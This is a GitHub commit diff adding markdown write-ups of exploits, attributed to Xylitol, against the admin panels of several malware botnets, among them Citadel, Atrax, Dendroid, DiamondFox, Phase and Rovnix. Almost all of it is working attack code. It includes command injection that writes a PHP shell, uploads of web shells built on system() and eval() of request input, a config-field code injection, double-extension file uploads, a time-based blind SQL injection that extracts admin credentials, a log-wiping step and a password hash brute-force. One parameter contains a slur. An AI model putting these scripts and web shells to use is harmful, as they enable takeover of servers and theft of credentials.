1 parent
039f59e
commit 686d940
Showing
11 changed files
with
411 additions
and
9 deletions.
@@ -0,0 +1,56 @@ | ||
#### Caberp | ||
|
||
|
||
Type: Remote Code Execution | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<table width="607" border="0"> | ||
<tr> | ||
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>"> | ||
<label for="carberp">Domain: </label> | ||
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" /> | ||
<input type="submit" name="button" id="button" value="Ownz !" /> | ||
</form></td> | ||
</tr> | ||
<tr> | ||
<td><?php | ||
/* | ||
Xyl2k! | ||
Greeting to Xartrick for fixing the payload (: | ||
*/ | ||
if(!isset($_POST['urlz'])) ; | ||
else | ||
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL)) | ||
{ | ||
echo "<font color='red'>URL is not valid</font>"; | ||
} | ||
else | ||
{ | ||
{ | ||
$data = array( | ||
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV', | ||
'data' => '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'); | ||
$ch = curl_init(); | ||
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php"); | ||
curl_setopt($ch, CURLOPT_HEADER, 0); | ||
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); | ||
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | ||
curl_setopt($ch, CURLOPT_POST, 1); | ||
curl_setopt($ch,CURLOPT_TIMEOUT,30); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, $data); | ||
$contents = curl_exec($ch); | ||
curl_close($ch); | ||
if (preg_match("#-#", $contents)) | ||
{ echo "<pre>" . $contents . "</pre>"; } | ||
else | ||
{ echo "<font color='red'>Not vulnerable :(</font>"; } | ||
} | ||
} | ||
?></td> | ||
</tr> | ||
</table> | ||
``` |
@@ -1,6 +1,58 @@ | ||
#### Citadel | ||
|
||
``` | ||
Type: SQLi | ||
``` | ||
Vuln: http://localhost/cp.php?bots=1 | ||
``` | ||
|
||
Type: Remote Code Execution | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
|
||
``` | ||
import urllib | ||
import urllib2 | ||
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability | ||
# Work only on windows box | ||
def request(url, params=None, method='GET'): | ||
if method == 'POST': | ||
urllib2.urlopen(url, urllib.urlencode(params)).read() | ||
elif method == 'GET': | ||
if params == None: | ||
urllib2.urlopen(url) | ||
else: | ||
urllib2.urlopen(url + '?' + urllib.urlencode(params)).read() | ||
def uploadShell(url, filename, payload): | ||
data = { | ||
'b' : 'tapz', | ||
'p1' : 'faggot', | ||
'p2' : 'hacker | echo "' + payload + '" >> ' + filename | ||
} | ||
request(url + 'test.php', data) | ||
def shellExists(url): | ||
return urllib.urlopen(url).getcode() == 200 | ||
def cleanLogs(url): | ||
delete = { | ||
'delete' : '' | ||
} | ||
request(URL + 'control.php', delete, 'POST') | ||
URL = 'http://localhost/citadel/winserv_php_gate/' | ||
FILENAME = 'shell.php' | ||
PAYLOAD = '<?php phpinfo(); ?>' | ||
uploadShell(URL, FILENAME, PAYLOAD) | ||
print '[~] Shell created!' | ||
if not shellExists(URL + FILENAME): | ||
print '[-]', FILENAME, 'not found...' | ||
else: | ||
print '[+] Go to:', URL + FILENAME | ||
cleanLogs(URL) | ||
print '[~] Logs cleaned!' | ||
``` |
@@ -0,0 +1,98 @@ | ||
#### Atrax | ||
|
||
|
||
Type: Shell Upload Vulnerability | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
import random | ||
import string | ||
import base64 | ||
import urllib | ||
import urllib2 | ||
# <CONFIG> | ||
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>' | ||
url = 'http://localhost/atrax/' | ||
# </CONFIG> | ||
BOT_MODE_INSERT = 'b' # BOT MODE | ||
BOT_MODE_RUNPLUGIN = 'e' | ||
GET_PARAM_MODE = 'a' # GET PARAM | ||
POST_PARAM_GUID = 'h' # POST PARAM | ||
POST_PARAM_IP = 'i' | ||
POST_PARAM_BUILDID = 'j' | ||
POST_PARAM_PC = 'k' | ||
POST_PARAM_OS = 'l' | ||
POST_PARAM_ADMIN = 'm' | ||
POST_PARAM_CPU = 'n' | ||
POST_PARAM_GPU = 'o' | ||
POST_PARAM_PLUGINNAME = 'q' | ||
def request(url, get, post): | ||
if not get == '': | ||
url += '?' + get | ||
encoded = {} | ||
if not post == '': | ||
for _ in post.split('&'): | ||
data = _.split('=') | ||
encoded[data[0]] = data[1] | ||
encoded = urllib.urlencode(encoded) | ||
request = urllib2.Request(url, encoded) | ||
response = urllib2.urlopen(request) | ||
page = response.read() | ||
return page | ||
def queryValue(key, value, next=True): | ||
ret = key + '=' + value | ||
if next: | ||
ret += '&' | ||
return ret | ||
def randomString(length = 8): | ||
return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length)) | ||
def createVictim(url, guid, ip): | ||
get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False) | ||
post = queryValue(POST_PARAM_GUID, guid) | ||
post += queryValue(POST_PARAM_IP, ip) | ||
post += queryValue(POST_PARAM_BUILDID, randomString()) | ||
post += queryValue(POST_PARAM_PC, randomString()) | ||
post += queryValue(POST_PARAM_OS, randomString()) | ||
post += queryValue(POST_PARAM_ADMIN, 'yes') | ||
post += queryValue(POST_PARAM_CPU, randomString()) | ||
post += queryValue(POST_PARAM_GPU, randomString(), False) | ||
return request(url + 'auth.php', get, post) | ||
def exploit(url, guid, ip, file, payload): | ||
get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False) | ||
post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer') | ||
post += queryValue(POST_PARAM_GUID, guid) | ||
post += queryValue(POST_PARAM_IP, ip) | ||
post += queryValue('am', randomString()) | ||
post += queryValue('ad', file) | ||
post += queryValue('ab', base64.b64encode(payload)) | ||
post += queryValue('ai', '18', False) | ||
request(url + 'auth.php', get, post) | ||
def testExploit(url, guid, ip): | ||
file = randomString() + '.php' | ||
payload = '<?php echo("1337"); ?>' | ||
exploit(url, guid, ip, file, payload) | ||
return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337' | ||
guid = '7461707a7461707a7461707a7461707a' | ||
ip = '91.224.13.103' | ||
file = randomString() + '.php' | ||
if createVictim(url, guid, ip).strip() == 'STOP': | ||
print '[-] Cannot create victim...' | ||
else: | ||
print '[~] Victim created/updated...' | ||
if testExploit(url, guid, ip): | ||
exploit(url, guid, ip, file, payload) | ||
print '[+] Exploit uploaded!' | ||
print '=> ' + url + 'plugins/atraxstealer/wallet/' + file | ||
else: | ||
print '[-] Cannot upload payload, maybe the plugin is not actived?' | ||
``` |
@@ -0,0 +1,37 @@ | ||
#### Dendroid | ||
|
||
|
||
Type: Remote Code Execution | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
import requests | ||
# Add URL | ||
# Set a PHP payload | ||
# Go to http://website/config.php | ||
URL = 'http://localhost/Panel/applysettings.php' | ||
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '" | ||
data = { | ||
'dbhost' : 'localhost', | ||
'dbname' : 'dendroid', | ||
'dbusername' : 'root', | ||
'dbpassword' : '', | ||
'username' : 'admin', | ||
'password' : 'admin', | ||
'postboxsize' : '10', | ||
'devicetablerefr' : '10000', | ||
'filetablerefr' : '10000', | ||
'historyboxrefr' : '5000', | ||
'botoffline' : '60', | ||
'timezone' : "Europe/Brussels';" + PAYLOAD, | ||
'messageboxscroll' : 'Yes', | ||
} | ||
headers = { 'Host': '127.0.0.1' } | ||
req = requests.post(URL, data=data, headers=headers) | ||
print 'HACKED!' | ||
``` |
@@ -0,0 +1,33 @@ | ||
#### Gorynych/DiamondFox v4.2.0.257 | ||
|
||
|
||
Type: File Upload Vulnerability | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title> | ||
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b --> | ||
</head> | ||
<body> | ||
<h1>◉ Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability ◉</h1> | ||
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data"> | ||
<input type="file" name="upload1"> | ||
<input type="hidden" name="slots" value="1"> | ||
<input type="submit" value="PWN!""> | ||
</form> | ||
File naming convention:<br> | ||
★ file.log.php (go to logs/dump/file.log.php)<br> | ||
★ file.jpg.php (go to logs/scr/file.jpg.php)<br> | ||
★ file.LOG.php (go to logs/pass/file.LOG.php)<br> | ||
★ file.txt.php (go to logs/ftp/file.txt.php)<br> | ||
★ file.TXT.php (go to logs/rdp/file.TXT.php)<br> | ||
★ file.TxT.php (go to logs/mail/file.TxT.php)<br> | ||
★ file.html.php (go to logs/kyl/file.html.php)<br> | ||
★ file.wallet.php (go to logs/wallet/file.wallet.php) | ||
</body> | ||
</html> | ||
``` |
@@ -0,0 +1,55 @@ | ||
#### Phase Botnet | ||
|
||
Type: Blind SQL injection vulnerability | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<?php | ||
// Start with PHP CLI (php pwn.php) | ||
set_time_limit(0); | ||
// Adjust this :) | ||
define('SLEEP_TIME', '4'); | ||
define('PAGE_TIME', 4); | ||
define('URL', 'http://localhost/Phase/'); | ||
echo('attacking ' . URL . PHP_EOL); | ||
get_string('username'); | ||
get_string('password'); | ||
function get_length($field) { | ||
$length = 1; | ||
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) { | ||
++$length; | ||
} | ||
echo($field . ' length: ' . $length . PHP_EOL); | ||
return $length; | ||
} | ||
function get_string($field) { | ||
$length = get_length($field); | ||
$str = ''; | ||
for ($i = 0; $i < $length; ++$i) { | ||
$str .= chr(get_char($field, $i)); | ||
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL); | ||
} | ||
return $str; | ||
} | ||
function get_char($field, $id) { | ||
$binary = ''; | ||
for ($i = 1; $i < 256; $i *= 2) { | ||
if ($i == 128) | ||
$binary = '0' . $binary; | ||
else | ||
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary; | ||
``` |
@@ -0,0 +1,55 @@ | ||
#### Rovnix | ||
|
||
|
||
Type: Hash Collision | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<?php | ||
/** | ||
* Defeat the weak hash function of Rovnix | ||
* to get password from a hash. | ||
*/ | ||
$HASH = 'fbff791ef0770855e599ea6f87d41653'; | ||
$value = getNumber($HASH); | ||
$search = search($value, $HASH); | ||
echo('Hash: ' . $HASH . '<br />'); | ||
echo('Value: ' . $value . '<br />'); | ||
echo('Search: ' . $search); | ||
// Search an working (number) password | ||
function search($value, $hash) { | ||
$i = 0; | ||
while (true) { | ||
if (getHash($i) == $value) | ||
return $i; | ||
$i++; | ||
} | ||
} | ||
// Get the hashed number | ||
function getNumber($hash) { | ||
$i = 0; | ||
while (true) { | ||
if (md5($i) == $hash) | ||
return $i; | ||
$i++; | ||
} | ||
} | ||
// Hash function without final MD5 (return only numbers) | ||
function getHash($hash) { | ||
$salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%jkjJn@@j$r@!cdh*!@#$djl1J$r!j@o*$@duJxlJLEKJkJFKJEJ2$jkeJFJLEJFE'; | ||
return $hash + $salt + md5($salt) + md5($hash) + $salt[3]; | ||
} | ||
?> | ||
``` |